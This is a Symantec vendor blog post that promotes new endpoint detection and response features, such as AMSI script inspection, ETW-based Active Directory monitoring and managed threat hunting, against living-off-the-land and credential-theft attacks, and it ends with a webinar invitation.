Posted: 4 Min ReadProduct Insights

New Visibility Features in Symantec Endpoint Detection and Response (EDR)

A rising number of cyber attacks exploit common blind spots in enterprise infrastructures. The new Symantec EDR toolset is a strong defense against attackers

Cyber security is a relentless, high-stakes game of cat-and-mouse. And nowhere is this more true than in the realm of endpoint security. As enterprises have ramped up their investment in tools like endpoint protection platforms (EPP) and endpoint detection and response (EDR) solutions, cyber criminals have kept pace. Forced to find new ways to launch attacks, they are evolving, adapting, and developing ever more sophisticated attack strategies. 

A principal attack strategy is to identify and target common blind spots in enterprise security infrastructures. Many of Symantec’s recent strategic investments in security products and services target attacker efforts to exploit these exact blind spots. Symantec, a division of Broadcom (NASDAQ: AVGO), added new capabilities to its EDR portfolio, raising its investment in advanced levels of protection.

These new tools are available as features in our flagship Symantec Endpoint Security Complete (SESC) product. Our foundational security product platform, SESC is designed to address security issues and the MITRE attack chain the only way that makes sense: holistically. SESC provides that holistic perspective while its individual tools and features address each of the different links in the attack chain from threat prevention early in the cycle to quickly detecting breaches and disabling attacks in progress.   

The majority of the new features focus specifically on solving for three of the most common and potentially dangerous blind spots that we see across a majority of organizations. These three areas are: 

  • Trusted tools and applications
  • Unprotected Active Directory (AD)
  • Late discovery of breaches 

Ending “Living Off the Land” Attacks

Trusted tools and apps are legitimate applications, dual-use tools and scripts that are almost impossible to avoid running in any organization. For example, virtually every organization uses Microsoft Office and PowerShell to drive worker productivity and routine Windows task automation. Along with third-party applications like Adobe Reader and Acrobat, they are so commonly used that they are practically ubiquitous, and as a consequence, default-trusted in the workplace.

In the colorful language of cyber security, attacks that use these commonly available, pre-installed tools are referred to as “living off the land” attacks. In other words, the attacker is using an organization’s own technology (land) to gain access to its most valuable data, financial, and other resources. 

A major problem is that it’s been very difficult to see into what these apps and their scripts are doing after they are executed and go into the system’s memory. SESC addresses that blind spot by using a Microsoft technology called Antimalware Scan Interface (AMSI) as basically an “eyehole” to see into scripts running on an endpoint, such as PowerShell or Microsoft Office macros. Our Symantec agent collects that data and makes it searchable to uncover malicious scripts.

A Malicious PowerShell script is decoded by AMSI, associated with MITRE ATT&CK techniques, and correlated with other activities
A Malicious PowerShell script is decoded by AMSI, associated with MITRE ATT&CK techniques, and correlated with other activities

Preventing the Chief Source of Ransomware

Most organizations have their endpoints connected to Active Directory. A lot of information is accessible through that, but especially information around credentials and privileged accounts that can be used to move laterally across an organization and access its most valuable resources. When attackers attempt to access this data, many of their activities are recorded by Microsoft via a technology called Event Tracing for Windows (ETW). For example, ETW can record an event if a remote desktop connection is being established from a compromised endpoint.  The problem has been that ETW is another data source that has to be correlated with all of the other activities recorded by the agent. Our SESC agent closes that blind spot – and with it, the number one source of all successful ransomware attacks -- by tapping into that additional data feed and automatically correlating it with all activities related to an attack.

A discovery technique logged by ETW is shown in the Symantec EDR 4.5 console
A discovery technique logged by ETW is shown in the Symantec EDR 4.5 console

Additionally, SESC’s Threat Defense for Active Directory prevents, not just detects, lateral movement of attackers using credential theft. It’s able to do this by obfuscating account credentials in the endpoint’s memory so the attacker is misled. Subsequently, their process is automatically blocked to contain the attack.

The attacker’s command shell is automatically isolated after they attempted to run a process using stolen credentials.
The attacker’s command shell is automatically isolated after they attempted to run a process using stolen credentials.

Cutting Through the Noise

If an organization does suffer a breach, nothing is more important than to identify that fact as soon as possible. To help with that task many organizations have deployed a rising number of security tools. The problem is that the more security tools, the more alerts. The result is that SOC analysts are being fire-hosed with way too many data streams for their limited time and resources. 

SESC closes this third major blind spot. Using advanced machine learning techniques, SESC’s Threat Hunter looks for unusual behavior and alerts our own experts here at Symantec when it does. Symantec threat hunters then immediately notify the organization’s SOC, dramatically reducing the response time to repair the breach. 

We’ve Got Your Back

Taken together, these enhancements to SESC bring a new level of comprehensive security by eliminating the common blind spots in most enterprise security infrastructures. But these enhancements are not alone. We are also constantly adding new features to SESC, such as Granular Activity Recorder Rules, to help analysts and system administrators collect data even more efficiently and eliminate unnecessary event noise.

Granular Activity Recorder Rules in Symantec EDR 4.5
Granular Activity Recorder Rules in Symantec EDR 4.5

Another recently added feature allows you to block non-executable scripts, documents, and other files – closing if not exactly a blind spot, but another major gap in the response mechanisms contained in many EDR products. 

All of these features are included within Symantec Endpoint Security Complete, the core of our defense in-depth strategy and the foundation upon which we will continually innovate. All built into a single agent and a single platform. From prevention to detection to augmenting your own security resources, in this relentless high-stakes game of cyber security cat-and-mouse: We’ve got your back. 

Symantec Enterprise Blogs
Webinar

Don’t Let Attackers Exploit your Blind Spots to Evade Detection

To learn more about how Symantec is strengthening its full-feature endpoint offering to protect against blind spots, join my colleague Gavin Fulton in this webinar on November 17, 2020, 10 a.m., PST.

Register Now for Webinar
Symantec Enterprise Blogs
You might also enjoy
Product Insights2 Min Read

Removing the 'Blind Spots' from SSL/TLS

Here’s how a new standard in network encryption features several security and performance benefits over its predecessor

Symantec Enterprise Blogs
You might also enjoy
Expert Perspectives4 Min Read

Symantec Participates in Latest MITRE ATT&CK® Evaluation

Detection and prevention are crucial for confronting advanced threats

About the Author

Adam Licata

Director of Product Management, Symantec Endpoint Security

Adam Licata is Director of Product Management for Endpoint Security at Symantec. Adam is leading the effort to transform Symantec’s market leading endpoint security product to a full cloud SaaS-based platform.

Want to comment on this post?

We encourage you to share your thoughts on your favorite social platform.